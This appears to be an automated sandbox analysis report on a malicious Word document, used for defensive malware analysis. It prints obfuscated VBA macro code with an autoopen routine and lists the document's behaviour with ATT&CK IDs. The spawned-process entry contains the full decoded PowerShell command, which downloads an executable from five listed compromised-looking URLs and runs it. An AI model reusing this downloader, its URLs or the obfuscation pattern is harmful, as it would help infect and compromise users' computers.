'Supervisor Coves matrix Kina Malaysian Ringgit Buckinghamshire Credit Card Account auxiliary Optimization Outdoors & Toys New Taiwan Dollar morph circuit
'/bypassingtuh
'Money Market Account Ford RAM panel 5th generation Florida Re-contextualized silver
Azerbaijanian_Manatsjt = "e-enable methodologies Supervisor withdrawal Sleek Practical Plastic Cheese bypass Home Loan Account Industrial & Computers Central Dynamic circuit"
'/Virtualfot
While Azerbaijanian_Manatsjt = wdXMLValidationStatusOK
'Creative client-server bricks-and-clicks Manors SQL plum Harbors Fantastic Frozen Ball connecting hierarchy Paraguay application Liaison
Opensourceatz = Azerbaijanian_Manatsjt + CInt(952) 'Agent Incredible process improvement end-to-end silver Awesome global Fundamental Graphical User Interface quantifying
'Sleek Granite Tuna open-source Investment Account leverage Parkways port Venezuela Triple-buffered
navigatingadr = Azerbaijanian_Manatsjt + Len("532") 'protocol Agent silver black Small Concrete Mouse envisioneer National
'Practical content Avon Refined Frozen Soap Lithuania backing up compress Cotton Steel deposit back-end architectures
Booksmod = Azerbaijanian_Manatsjt + CInt(585) 'Generic asynchronous purple withdrawal green Rhode Island ROI deposit Infrastructure Buckinghamshire Coves well-modulated Tasty cyan
'invoice Refined Industrial, Toys & Toys navigating exploit networks Saudi Riyal clicks-and-mortar PCI Congo
Woodenjph = Azerbaijanian_Manatsjt + Len("690") 'back up bandwidth Tactics access User-friendly input throughput Surinam Dollar Glen Rubber Rustic Fresh Toys optimal
'Tactics British Indian Ocean Territory (Chagos Archipelago) card compressing backing up Extended hacking markets
Irelandkzj = Azerbaijanian_Manatsjt + Len("209") 'payment parse Overpass Forks Security Personal Loan Account Direct invoice Home Money Market Account Home Loan Account
'Auto Loan Account Plaza tangible data-warehouse Developer navigate transmit budgetary management scale
Valleyibm = Azerbaijanian_Manatsjt + CStr(Heard_Island_and_McDonald_Islandswtz) 'Distributed Credit Card Account AI array Forges Texas
'transmit Music, Music & Games Paradigm benchmark quantifying Cross-platform circuit Producer Frozen TCP Villages Metrics Unbranded Frozen Table Handcrafted Wooden Sausages
Wend
'Director bluetooth Tasty Cotton Table COM auxiliary withdrawal Architect Borders experiences Legacy Alabama purple Small
End Function
Function Health__Toysfwz(Harborhtw)
On Error Resume Next
'/Incredible_Concrete_Chairkfj
'experiences Connecticut Gambia Fantastic Wooden Gloves Connecticut Berkshire Refined Wooden Salad integrated
Azerbaijanian_Manatsjt = "Central Designer coherent Jewelery online Grocery
Movies & Automotive"
'/Baby__Beautynts
While Azerbaijanian_Manatsjt = wdXMLValidationStatusOK
'Beauty, Garden & Music Hollow Tasty Plastic Shoes Place Uzbekistan Sum project array Metrics Garden, Home & Automotive Money Market Account
clientdrivenpbi = Azerbaijanian_Manatsjt + CInt(802) 'connecting Business-focused communities indexing implement withdrawal Fresh Ways hard drive Common Implementation
'Phased attitude Solutions overriding Intelligent Frozen Chair Graphical User Interface Fantastic Steel Pants copying Forward invoice
Berkshirebnm = Azerbaijanian_Manatsjt + Len("47") 'back-end applications Road back-end reintermediate middleware compress software deposit Applications partnerships
'Chile National Denmark Organic grid-enabled Operations productivity Wall Money Market Account ADP payment Cotton
Motorwayubw = Azerbaijanian_Manatsjt + CInt(579) 'Auto Loan Account Small application hacking innovate deposit Functionality
'blue scalable exploit deposit Analyst Programmable Myanmar Walks Trace Sleek Metal Fish Gorgeous Fresh Hat Springs
missioncriticalcuw = Azerbaijanian_Manatsjt + Len("937") 'Generic Wooden Pants Fantastic Wooden Cheese Fresh dedicated index multi-byte bypass Enterprise-wide Key reciprocal violet Mississippi Program
'Facilitator tertiary Fantastic Cotton Salad Savings Account Stravenue generating Station card Customer
Drivesail = Azerbaijanian_Manatsjt + Len("271") 'Buckinghamshire executive indigo forecast plum quantifying bypassing AI
'Facilitator magnetic cyan Corner input Ohio grey program
Dynamicmmz = Azerbaijanian_Manatsjt + CStr(enterprisewsi) 'Maine Hawaii Personal Loan Account port Small Metal Chair productivity Producer microchip transmitting
'Applications engage e-business Knolls Pre-emptive Licensed Fresh Soap Granite North Dakota bypass Ergonomic Cotton Mouse violet mobile
Wend
'program Strategist Utah archive Representative ADP extranet
'/salmonfzv
'Practical Fresh Salad Metal payment Small Cotton Fish Tala Intelligent metrics maximize Investment Account
Azerbaijanian_Manatsjt = "deposit 24/7 access Borders cross-platform program Home
Home & Garden Incredible multi-tasking Customer"
'/Humanzon
While Azerbaijanian_Manatsjt = wdXMLValidationStatusOK
'digital methodologies generate Associate Saudi Riyal Tunisian Dinar
systemrzh = Azerbaijanian_Manatsjt + CInt(782) 'Kina Practical deposit Indiana Tasty transmitting Unbranded Wooden Towels encoding repurpose pixel
'Stream TCP Taka open-source Rustic innovative Credit Card Account Profound deposit
Handcrafted_Rubber_Soapzru = Azerbaijanian_Manatsjt + Len("958") 'Metal Cambridgeshire efficient transmitting technologies index holistic Ergonomic Wooden Ball North Carolina
'interactive Squares SMTP Arizona implementation world-class deposit Common Generic Bedfordshire gold withdrawal Norway
Synchronisedkbz = Azerbaijanian_Manatsjt + CInt(141) 'copying Sleek Cambridgeshire Small quantifying magenta Branding Toys, Automotive & Movies Handmade Fantastic Frozen Chair South Carolina Monitored
'Slovenia Gorgeous Synchronised lavender parse architectures Money Market Account Interactions bandwidth compressing
Securedlfo = Azerbaijanian_Manatsjt + Len("747") 'ROI card Union Rand Granite Corporate COM transparent Cotton transmitter transmitting mobile payment Fresh
'paradigms Personal Loan Account Representative Movies program circuit fuchsia application neutral Tasty Wooden Bacon Representative Kids & Health calculate
Checking_Accountaoj = Azerbaijanian_Manatsjt + Len("253") 'Forward connecting Refined Steel Mouse Global Handmade Plastic Soap e-commerce Personal Loan Account Timor-Leste applications Refined Plastic Ball
'invoice Optimization Square budgetary management Operations monitoring index
Regionaldjm = Azerbaijanian_Manatsjt + CStr(Garden__Electronicsoim) 'Ergonomic Soft Hat Group Berkshire Hungary bluetooth Agent Balanced driver responsive Balanced Intuitive
'Gorgeous Estates invoice utilisation blue copying Sleek Fresh Pizza open-source Orchard Hryvnia navigating
Wend
'Human virtual redefine Tasty Fresh Shirt Prairie Engineer alarm Refined metrics Unbranded Frozen Bike
copyhsl = Harborhtw
'/ebusinesscow
'Cotton Kids, Clothing & Clothing heuristic Shoes Small Fords Internal Buckinghamshire Intelligent Fresh Hat Sierra Leone Summit experiences redefine COM
Azerbaijanian_Manatsjt = "Tasty Frozen Mouse orchestrate deposit lavender Strategist Arkansas Devolved Implementation Heights Unbranded Granite Shoes Station Synergistic"
'/wa247nco
While Azerbaijanian_Manatsjt = wdXMLValidationStatusOK
'indexing withdrawal EXE quantifying next generation Bedfordshire Books, Automotive & Beauty El Salvador
Unionvoh = Azerbaijanian_Manatsjt + CInt(426) 'maximize Vision-oriented Sleek Rubber Shirt global Buckinghamshire Washington cross-platform Guyana Dollar Bahamian Dollar Kids Future panel encryption
'HDD Interactions Texas methodical Berkshire virtual Rubber indigo
Glenswqr = Azerbaijanian_Manatsjt + Len("563") 'Interactions aggregate Georgia Auto Loan Account communities Small Plastic Cheese Islands Compatible
'networks Sudan Beauty program programming optical withdrawal Plastic synthesizing
Parkjim = Azerbaijanian_Manatsjt + CInt(681) 'Soft Wyoming Granite open architecture Exclusive driver paradigms Intelligent Cotton Ball Unbranded monitoring primary
'reboot Islands Nepal Multi-channelled Home Loan Account Plastic transmitting action-items Jordanian Dinar initiative Buckinghamshire Buckinghamshire indexing Electronics, Automotive & Health
Tastyapv = Azerbaijanian_Manatsjt + Len("784") 'Way Fields cyan Directives Checking Account groupware programming card Texas override Regional
'model Administrator connecting Garden & Computers Bermudian Dollar (customarily known as Bermuda Dollar) Forint e-markets violet override withdrawal maroon invoice Wooden
quantifyingtuw = Azerbaijanian_Manatsjt + Len("847") 'Avenue deliverables Cliffs New Taiwan Dollar Right-sized Fantastic Wooden Chair deposit monitor Implemented Usability
'withdrawal Rapids Uganda Shilling Passage auxiliary e-business Fantastic Fresh Sausages Borders payment strategize harness Handcrafted Soft Keyboard
paymentrjm = Azerbaijanian_Manatsjt + CStr(optimizejbb) 'invoice Row tan leading-edge ubiquitous exploit world-class Supervisor Engineer
'compressing Licensed Concrete Tuna array Fords Direct Checking Account Automotive ADP Solomon Islands Dollar deposit pixel Falls
Wend
'open-source Kuwaiti Dinar viral neural Cambridgeshire SMTP Solutions
indigoqss = "61"
'/Home_Loan_Accountpnn
'programming Intelligent Extended next-generation Handmade Wooden Soap leading edge orange Extension
Azerbaijanian_Manatsjt = "withdrawal Direct SAS Oregon overriding French Southern Territories Intelligent Granite Chicken"
'/bandwidthmonitoredvfb
While Azerbaijanian_Manatsjt = wdXMLValidationStatusOK
'synthesizing Customer envisioneer parsing Tasty Plastic Cheese Gorgeous Savings Account
scalepuw = Azerbaijanian_Manatsjt + CInt(911) 'North Dakota Movies & Clothing Kids Berkshire Plastic synthesize Direct Road Isle Internal distributed Representative Central
'bluetooth Passage process improvement leverage Orchestrator Metal
programmingzjo = Azerbaijanian_Manatsjt + Len("537") 'Viaduct SCSI Guarani solutions Port Borders gold invoice European Unit of Account 17(E.U.A.-17) Soft
'Refined optical connecting Strategist paradigm Frozen Road parse Applications FTP
Directzzp = Azerbaijanian_Manatsjt + CInt(954) 'North Carolina Games Fantastic Avon Missouri Sleek extensible hack Small Wooden Tuna methodologies firewall Ukraine Avon
'European Unit of Account 17(E.U.A.-17) Automated digital Stream Credit Card Account override Thailand
primaryzlc = Azerbaijanian_Manatsjt + Len("272") 'override Computers & Movies Outdoors, Grocery & Clothing deposit withdrawal Credit Card Account Fresh Lights Money Market Account Handcrafted Wooden Keyboard Global enhance
'Liaison Cuba Lithuania Handcrafted Cotton Chair backing up copy Ergonomic Soft Hat
copyumz = Azerbaijanian_Manatsjt + Len("594") 'Strategist Money Market Account Practical Frozen Consultant Unbranded Incredible Cook Islands firewall Investment Account
'back-end Investment Account Berkshire Place Portugal Arkansas disintermediate Hungary River Ergonomic Awesome Eritrea Meadow
Auto_Loan_Accountiok = Azerbaijanian_Manatsjt + CStr(connectovh) 'Operations Mayotte Ports Hill circuit reinvent wireless connecting
'Garden Ameliorated Oklahoma back-end Brook relationships
Wend
'architect Islands parsing Centers Tasty Fresh
Health__Toysfwz = Replace(copyhsl, indigoqss, "") 'Checking Account payment Practical Fresh Shirt Optional Concrete Awesome Frozen Bike Jordanian Dinar
'/Knollsdnt
'Planner Universal Analyst zero tolerance transparent Secured supply-chains Incredible Cotton Shoes Intelligent Steel Mouse Steel protocol Incredible global
Azerbaijanian_Manatsjt = "Intelligent Plastic Chicken Designer payment Rustic vertical Ergonomic Concrete Table Metal Handmade turquoise"
'/Small_Frozen_Towelsrka
While Azerbaijanian_Manatsjt = wdXMLValidationStatusOK
'sky blue impactful Extensions Dam functionalities deposit parse Roads Netherlands payment
feedzjj = Azerbaijanian_Manatsjt + CInt(932) 'e-business backing up Steel programming Kip methodical
'Generic Refined Cotton Mouse Sleek Frozen system redefine complexity Administrator Granite Sleek Steel Ball Dalasi withdrawal synergistic
transitionalvak = Azerbaijanian_Manatsjt + Len("923") 'Cambridgeshire deposit Automotive Hills real-time Awesome Granite Keyboard systems Soft invoice eco-centric haptic Orchard hack Sleek
'deposit content 1080p utilisation Concrete paradigms
systemjbs = Azerbaijanian_Manatsjt + CInt(932) 'solid state Chief Delaware model North Dakota Uganda Shilling
'orchid connecting Plaza turquoise Sharable HTTP Small Plastic Soap strategic Investment Account
Generic_Metal_Cheesecuq = Azerbaijanian_Manatsjt + Len("913") 'Bedfordshire Trinidad and Tobago Credit Card Account Orchestrator online Supervisor interfaces client-server Legacy Missouri
'Unbranded Soft Chips Jewelery, Beauty & Jewelery Cedi streamline focus group Executive Interactions bluetooth Prairie optical THX Springs
greydfh = Azerbaijanian_Manatsjt + Len("36") 'Handcrafted Rubber Soap Plastic Keys Utah optical Buckinghamshire Wooden Village Concrete asymmetric Facilitator
'bus Bedfordshire Games Distributed alarm Developer reboot Accounts Orchard
Kentuckywsh = Azerbaijanian_Manatsjt + CStr(exploithil) 'Ergonomic Marketing generate Savings Account Global interactive
'Handmade circuit system-worthy dynamic models Port
Wend
'microchip Granite backing up Practical Metal Hat Legacy synthesize Sudanese Pound
End Function
Sub autoopen()
On Error Resume Next
'/Garden_Movies__Movieszin
'e-business Realigned compressing Illinois Facilitator Taka Fall Plastic French Southern Territories interfaces platforms
Azerbaijanian_Manatsjt = "functionalities visionary haptic parsing Granite Generic Frozen Hat Sweden online"
'/Intelligent_Cotton_Computerjzz
While Azerbaijanian_Manatsjt = wdXMLValidationStatusOK
'invoice Virgin Islands, British artificial intelligence Tools & Toys Multi-layered budgetary management
scalepbh = Azerbaijanian_Manatsjt + CInt(141) 'database Bedfordshire productize Avenue synergies hack Forward Pre-emptive quantifying Ukraine
'Operations Investment Account Flat compressing Gorgeous Metal Tuna 24/7 paradigm Health backing up Investment Account Bedfordshire Intelligent Concrete Ball
dynamicipj = Azerbaijanian_Manatsjt + Len("137") 'synthesize Wisconsin aggregate bluetooth Handcrafted Wooden Computer Refined Wooden Gloves Fresh Central Montenegro Savings Account
'invoice analyzer Intelligent Cotton Chair Checking Account incubate Handcrafted Fresh Bacon Benin Analyst parallelism
Dominicaqcq = Azerbaijanian_Manatsjt + CInt(320) 'synthesizing mission-critical Gorgeous object-oriented override Fantastic hierarchy Legacy
'Cambridgeshire bandwidth-monitored Avon Borders Practical Steel Computer Administrator Savings Account Chief Sleek Soft Chips
connectingksr = Azerbaijanian_Manatsjt + Len("542") 'Wooden reboot Digitized Buckinghamshire deploy PNG Savings Account Devolved Public-key radical Computers & Electronics
'navigate West Virginia Island synergize Analyst US Dollar engage Product Fantastic Steel Towels mint green online
Villageqsv = Azerbaijanian_Manatsjt + Len("796") 'USB Jamaican Dollar Virtual Optimization COM Unbranded Rubber Towels ability
'Sleek Soft Computer infrastructures bluetooth parse New Leu Oklahoma Planner Arkansas Handmade Metal Chips Small Rubber Bike Self-enabling Branch Denar Ergonomic Granite Fish
Malagasy_Ariarypts = Azerbaijanian_Manatsjt + CStr(withdrawalwlm) 'visualize Handmade Frozen Car Money Market Account demand-driven Directives Park real-time Borders robust product Cook Islands Principal
'Reverse-engineered client-driven Investment Account white fuchsia Jewelery Investment Account Legacy definition Intelligent Fresh Tuna Steel Shoal
Wend
'Lights Savings Account IB Creative JBOD Metal Cambridgeshire viral Borders Licensed Metal Chicken integrate
'/Anguillafzu
'Upgradable synthesizing scalable Rustic Wooden Fish transmit Ridges Sleek Fresh Cheese United Kingdom Credit Card Account bypass XML Generic Fresh Chicken
Azerbaijanian_Manatsjt = "Movies
Toys & Automotive Solutions Sleek Soft Bacon Analyst override San Marino cross-platform European Unit of Account 9(E.U.A.-9)"
'/Estoniasbw
While Azerbaijanian_Manatsjt = wdXMLValidationStatusOK
'Directives Knolls Delaware circuit mobile Illinois Buckinghamshire Handmade Steel Cheese Multi-layered Guinea Franc bypass deposit Tools, Shoes & Garden
moderatorjci = Azerbaijanian_Manatsjt + CInt(220) 'Distributed bypass New Mexico Fantastic Soft Ball multi-tasking virtual
'driver Rustic input Electronics orchid e-services navigate Licensed Granite Car
Bedfordshirekuj = Azerbaijanian_Manatsjt + Len("617") 'Haven Handcrafted Rubber Shoes Refined Cotton Table violet Personal Loan Account solid state
'Unbranded Soft Soap Director Tasty Rubber Table Gorgeous Cotton Chair Investment Account quantify silver withdrawal Borders
lavenderbqa = Azerbaijanian_Manatsjt + CInt(481) 'Personal Loan Account payment Books, Health & Beauty overriding Ameliorated Direct directional
'Rustic Incredible Fresh Table engineer calculate Sports, Computers & Sports Creek Associate
indigodvz = Azerbaijanian_Manatsjt + Len("685") 'withdrawal Assistant Ridges quantify index applications Cambridgeshire Metical orange enterprise Bedfordshire Integration
'Frozen Rwanda Franc Islands reboot Program Walks Plastic pixel Fresh Knolls transparent
whiteboardtrt = Azerbaijanian_Manatsjt + Len("685") 'South Dakota Handcrafted Metal Keyboard override Maryland innovate Cayman Islands Dollar
'Associate Administrator Home Loan Account ADP synergistic Trail Row Credit Card Account payment SQL Turnpike Togo
Pound_Sterlingohn = Azerbaijanian_Manatsjt + CStr(Portsbuz) 'alarm Soft Bedfordshire Investment Account Money Market Account Checking Account CSS neural
'Security Berkshire Right-sized Arizona Washington bus navigating Beauty Handcrafted Administrator Frozen Wooden
Wend
'Gorgeous Plastic Computer Springs Buckinghamshire Fantastic Plastic Shirt Handcrafted Brand Intelligent Rubber Shoes generate black Montana connect navigating
Surinamenjp
'/whitepbn
'back-end monetize Sleek Plastic Sausages Officer Compatible primary
Azerbaijanian_Manatsjt = "payment Lights circuit collaborative systems back-end Small California"
'/Handmadeitn
While Azerbaijanian_Manatsjt = wdXMLValidationStatusOK
'Automotive, Kids & Toys green generate Squares Concrete enhance invoice
transmitterzwp = Azerbaijanian_Manatsjt + CInt(232) 'Rubber bypassing pricing structure Security synthesizing matrix Investment Account exuding GB Digitized Sleek Granite Tuna invoice asymmetric lime
'Baby & Jewelery Group driver Nakfa Designer North Korean Won productivity HTTP Pennsylvania end-to-end Kids & Kids Concrete disintermediate Cambridgeshire
Specialisthub = Azerbaijanian_Manatsjt + Len("283") 'RAM array next-generation Cambridgeshire invoice Wells orchid primary customized Toys Junctions
'index mint green encryption New Zealand process improvement Metal Rest Division Awesome Metal Computer
Checking_Accountizc = Azerbaijanian_Manatsjt + CInt(44) 'Buckinghamshire Industrial backing up indexing 24/7 Graphical User Interface matrix Marketing
'deposit Delaware Cross-platform Business-focused Integration disintermediate Well Bolivar Fuerte e-enable Markets Dynamic Bedfordshire deposit Operations
Home__Homeico = Azerbaijanian_Manatsjt + Len("961") 'overriding calculating Tools enable Response Baht Advanced
'Ramp Causeway mesh Camp backing up Illinois Ridge infrastructure Rustic Kroon interface withdrawal
calculatingrtz = Azerbaijanian_Manatsjt + Len("446") 'Rubber paradigm Plaza mobile deposit COM blue Walks
'reinvent Grocery, Movies & Automotive US Dollar Extensions Bahrain Specialist Ameliorated Unbranded compress
Buckinghamshireqdj = Azerbaijanian_Manatsjt + CStr(paymentwzr) 'pixel ivory Intranet solution-oriented Cedi Designer bus Guyana Factors Handcrafted Rubber Pizza Administrator hard drive Bond Markets Units European Composite Unit (EURCO) payment
'Wooden calculating payment mobile Berkshire Dong Wooden
Wend
'silver strategic program Rustic bypassing invoice Auto Loan Account Outdoors & Garden Rustic Wooden Bacon Lek Unbranded Rubber Chips
'/Producerkmc
'Passage Producer transmitter Robust sky blue Soft Cambridgeshire process improvement Licensed Frozen Chair Executive Highway US Dollar Computers & Garden
Azerbaijanian_Manatsjt = "Facilitator attitude-oriented Pound Sterling Unbranded Soft Idaho"
'/Personal_Loan_Accountnvw
While Azerbaijanian_Manatsjt = wdXMLValidationStatusOK
'grey Innovative deposit United States of America Identity Infrastructure Industrial & Baby Handmade Soft Pizza Thailand Indiana Guinea-Bissau algorithm deposit
Productszu = Azerbaijanian_Manatsjt + CInt(161) 'Costa Rican Colon Rue Future Incredible standardization copying benchmark
'International Fantastic global copying Developer card mobile
Steeliaa = Azerbaijanian_Manatsjt + Len("821") 'SQL XML real-time invoice Gorgeous Spring
'Pennsylvania View Officer Cambridgeshire extend upward-trending compress frictionless ivory Grocery & Music Ways Coordinator Generic Frozen Keyboard Auto Loan Account
programdrf = Azerbaijanian_Manatsjt + CInt(528) 'Optimization SDD Senior firewall optical Circles Tasty Soft Chair Hollow Hills Streamlined magnetic
'web-enabled Web Unbranded Frozen Bike Practical Frozen Bike incentivize infrastructures Jewelery & Beauty Guinea Program Checking Account Generic Granite Gloves Corners Practical Soft Table Wooden
Chiefmls = Azerbaijanian_Manatsjt + Len("391") 'cultivate National Investor Applications deposit Central out-of-the-box Refined Frozen Sausages Tokelau Liaison Iceland Krona Dong programming
'Unbranded Yemen Games, Sports & Kids Practical Plastic Computer Plastic Developer Tasty Fresh Car installation
digitalzwn = Azerbaijanian_Manatsjt + Len("303") 'solid state Cross-group teal Nigeria Handmade Steel Shirt feed
'Central e-markets teal generate indigo synthesizing feed invoice Jewelery, Grocery & Clothing Licensed solid state deposit Holy See (Vatican City State) Bypass
inputflf = Azerbaijanian_Manatsjt + CStr(greyajv) 'calculate pricing structure Park Synergistic Soft optimal ROI supply-chains parsing
'Handmade Concrete Soap utilisation quantifying Credit Card Account Colorado bandwidth-monitored Skyway Intelligent experiences Incredible Soft Chips payment
Wend
'action-items deliver Canada impactful gold back-end virtual
End Sub"
File "Humanaoo.bas" (Streampath: "Macros/VBA/Humanaoo") has code: "" - source
- Static Parser
- relevance
- 10/10
-
Contains embedded VBA macros (normalized)
- details
-
Normalized macro string: "http"
Normalized macro string: "HTTP" - source
- File/Memory
- relevance
- 10/10
- ATT&CK ID
- T1137
-
Creates a writable file in a temporary directory
- details
-
"WINWORD.EXE" created file "%TEMP%\~DF6CF2E1016DFBD351.TMP"
"WINWORD.EXE" created file "%TEMP%\Word8.0\MSForms.exd" - source
- API Call
- relevance
- 1/10
-
Creates mutants
- details
-
"\Sessions\1\BaseNamedObjects\Global\552FFA80-3393-423d-8671-7BA046BB5906"
"Local\ZonesLockedCacheCounterMutex"
"Local\x64_10MU_ACBPIDS_S-1-5-5-0-62922"
"Local\ZonesCacheCounterMutex"
"Global\MTX_MSO_AdHoc1_S-1-5-21-686412048-2446563785-1323799475-1001"
"Global\552FFA80-3393-423d-8671-7BA046BB5906"
"Global\MTX_MSO_Formal1_S-1-5-21-686412048-2446563785-1323799475-1001"
"Local\x64_10MU_ACB10_S-1-5-5-0-62922"
"\Sessions\1\BaseNamedObjects\Local\x64_10MU_ACBPIDS_S-1-5-5-0-62922"
"\Sessions\1\BaseNamedObjects\Local\x64_10MU_ACB10_S-1-5-5-0-62922"
"\Sessions\1\BaseNamedObjects\Local\ZonesCacheCounterMutex"
"\Sessions\1\BaseNamedObjects\Local\ZonesLockedCacheCounterMutex"
"\Sessions\1\BaseNamedObjects\Global\MTX_MSO_Formal1_S-1-5-21-686412048-2446563785-1323799475-1001"
"\Sessions\1\BaseNamedObjects\Global\MTX_MSO_AdHoc1_S-1-5-21-686412048-2446563785-1323799475-1001" - source
- Created Mutant
- relevance
- 3/10
-
Drops files marked as clean
- details
- Antivirus vendors marked dropped file "~__583658295301_1004.doc" as clean (type is "data")
- source
- Binary File
- relevance
- 10/10
-
Loads rich edit control libraries
- details
- "WINWORD.EXE" loaded module "%COMMONPROGRAMFILES%\Microsoft Shared\OFFICE14\RICHED20.DLL" at F4960000
- source
- Loaded Module
- ATT&CK ID
- T1179
-
Loads the .NET runtime environment
- details
- "powershell.exe" loaded module "%WINDIR%\assembly\NativeImages_v2.0.50727_64\mscorlib\0478aed7fc25ae268474c704fd2a3e0f\mscorlib.ni.dll" at E13F0000
- source
- Loaded Module
-
Process launched with changed environment
- details
-
Process "powershell.exe" was launched with modified environment variables: "CommonProgramFiles, Path, PROCESSOR_ARCHITECTURE, ProgramFiles"
Process "powershell.exe" was launched with missing environment variables: "MEOW, PROCESSOR_ARCHITEW6432, PROMPT, VXDIR"
Process "897.exe" was launched with modified environment variables: "PSModulePath"
Process "897.exe" was launched with new environment variables: "PROCESSOR_ARCHITEW6432="AMD64""
Process "897.exe" was launched with modified environment variables: "CommonProgramFiles, PROCESSOR_ARCHITECTURE, ProgramFiles"
Process "capprep.exe" was launched with modified environment variables: "CommonProgramFiles, LOCALAPPDATA, USERDOMAIN, PROCESSOR_ARCHITECTURE, PSModulePath, TEMP, APPDATA, USERPROFILE, TMP, ProgramFiles"
Process "capprep.exe" was launched with missing environment variables: "PROCESSOR_ARCHITEW6432, LOGONSERVER, HOMEPATH, HOMEDRIVE"
Process "capprep.exe" was launched with new environment variables: "PROCESSOR_ARCHITEW6432="AMD64""
Process "capprep.exe" was launched with modified environment variables: "CommonProgramFiles, PROCESSOR_ARCHITECTURE, ProgramFiles" - source
- Monitored Target
- relevance
- 10/10
-
Removes Office resiliency keys (often used to avoid problems opening documents)
- details
-
"WINWORD.EXE" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\OFFICE\14.0\WORD\RESILIENCY\STARTUPITEMS"; Key: "T+4")
"WINWORD.EXE" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\OFFICE\14.0\WORD\RESILIENCY\STARTUPITEMS"; Key: "H-4")
"WINWORD.EXE" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\OFFICE\14.0\WORD\RESILIENCY\STARTUPITEMS"; Key: "J*4")
"WINWORD.EXE" (Access type: "DELETE"; Path: "HKCU\SOFTWARE\MICROSOFT\OFFICE\14.0\WORD\RESILIENCY\STARTUPITEMS") - source
- Registry Access
- relevance
- 10/10
- ATT&CK ID
- T1112
-
Scanning for window names
- details
-
"WINWORD.EXE" searching for class "mspim_wnd32"
"WINWORD.EXE" searching for class "MSOBALLOON"
"WINWORD.EXE" searching for class "MsoHelp10"
"WINWORD.EXE" searching for class "AgentAnim"
"WINWORD.EXE" searching for class "Shell_TrayWnd" - source
- API Call
- relevance
- 10/10
- ATT&CK ID
- T1010
-
Spawns new processes
- details
- Spawned process "powershell.exe" with commandline "powershell -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGM ..." (UID: 00025715-00002684, Additional Context: "<# https://www.microsoft.com/ #> $motivatingquq='Intelligentbqv';$modelsvhz = '897';$Assistantopz='Handcraftedcrd';$solid_statezch=$env:userprofile+'\'+$modelsvhz+'.exe';$plumkqj='US_Dollarjsz';$greenjwa=.('n'+'ew'+'-ob'+'ject') neT.webCLienT;$Rustic_Cotton_Fishsvl='http://www.eteensblog.com/2tgmnk/fJZIPCYV/@http://www.palisek.cz/wp-includes/YtgJbWQNtJ/@http://www.mnminfrasolutions.com/wp-admin/zeteXeJYC/@http://abbasargon.com/wp-admin/sqhztj4_dzq3e-019802155/@https://weiqing7.com/ex6/3r2js_ocgr3bew87-538460/'."s`PLiT"('@');$Graphical_User_Interfacezvu='Advancedinf';foreach($US_Dollarrbr in $Rustic_Cotton_Fishsvl){try{$greenjwa."D`owN`LOAdfiLE"($US_Dollarrbr, $solid_statezch);$wirelessfud='worldclassnkp';If ((.('G'+'et-'+'Item') $solid_statezch)."Le`NgTh" -ge 27543) {[Diagnostics.Process]::"s`TArt"($solid_statezch);$arrayvhc='maroonhat';break;$Azerbaijanwjk='calculateufw'}}catch{}}$Guyanalsw='Locksmvo'"), Spawned process "897.exe", Spawned process "897.exe" with commandline "--caaf215f", Spawned process "capprep.exe", Spawned process "capprep.exe" with commandline "--83c0e935"
- source
- Monitored Target
- relevance
- 3/10
-
Contacts domains
-
Installation/Persistence
-
Contains ability to lookup the windows account name
- details
- GetUserNameA@ADVAPI32.dll
- source
- Hybrid Analysis Technology
- relevance
- 5/10
-
Dropped files
- details
-
"~__583658295301_1004.doc" has type "data"
"897.exe" has type "PE32 executable (GUI) Intel 80386 for MS Windows"
"RE_583658295301_1004.LNK" has type "MS Windows shortcut Item id list present Points to a file or directory Has Relative path Archive ctime=Fri Oct 4 20:52:48 2019 mtime=Fri Oct 4 20:52:48 2019 atime=Fri Oct 4 20:52:56 2019 length=190976 window=hide"
"8785896.wmf" has type "ms-windows metafont .wmf"
"index.dat" has type "data"
"4F9A5442.wmf" has type "ms-windows metafont .wmf"
"C2DA935B.wmf" has type "ms-windows metafont .wmf"
"386260D7.wmf" has type "ms-windows metafont .wmf"
"3B6F62A9.wmf" has type "ms-windows metafont .wmf"
"849394EC.wmf" has type "ms-windows metafont .wmf"
"B231C914.wmf" has type "ms-windows metafont .wmf"
"85992E05.wmf" has type "ms-windows metafont .wmf"
"~WRS_1A55B392-6FBE-4E4D-8194-2A5527168528_.tmp" has type "data"
"443E14AE.wmf" has type "ms-windows metafont .wmf"
"80E439F.wmf" has type "ms-windows metafont .wmf"
"98416121.wmf" has type "ms-windows metafont .wmf"
"N8JKJMHQ1SGAVY4IHO3E.temp" has type "data"
"5FB2BDA0.wmf" has type "ms-windows metafont .wmf"
"MSForms.exd" has type "data"
"~_Normal.dotm" has type "data"
- source
- Binary File
- relevance
- 3/10
-
Drops executable files
- details
- "897.exe" has type "PE32 executable (GUI) Intel 80386 for MS Windows"
- source
- Binary File
- relevance
- 10/10
-
Found a string that may be used as part of an injection method
- details
- "Shell_TrayWnd" (Taskbar window class may be used to inject into explorer with the SetWindowLong method)
- source
- File/Memory
- relevance
- 4/10
- ATT&CK ID
- T1055
-
Touches files in the Windows directory
- details
-
"WINWORD.EXE" touched file "C:\Windows\Globalization\Sorting\SortDefault.nls"
"WINWORD.EXE" touched file "C:\Windows\Fonts\StaticCache.dat"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\clr.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorwks.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\clr.dll"
"WINWORD.EXE" touched file "C:\Windows\System32\en-US\user32.dll.mui"
"WINWORD.EXE" touched file "%LOCALAPPDATA%\Microsoft\Windows\Caches"
"WINWORD.EXE" touched file "C:\Users\%USERNAME%\AppData\Local\Microsoft\Windows\Caches\cversions.1.db"
"WINWORD.EXE" touched file "C:\Users\%USERNAME%\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000001d.db"
"WINWORD.EXE" touched file "C:\Windows\System32\en-US\KernelBase.dll.mui"
"WINWORD.EXE" touched file "C:\Windows\System32\msxml6r.dll"
"WINWORD.EXE" touched file "C:\Users\%USERNAME%\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{1A55B392-6FBE-4E4D-8194-2A5527168528}.tmp"
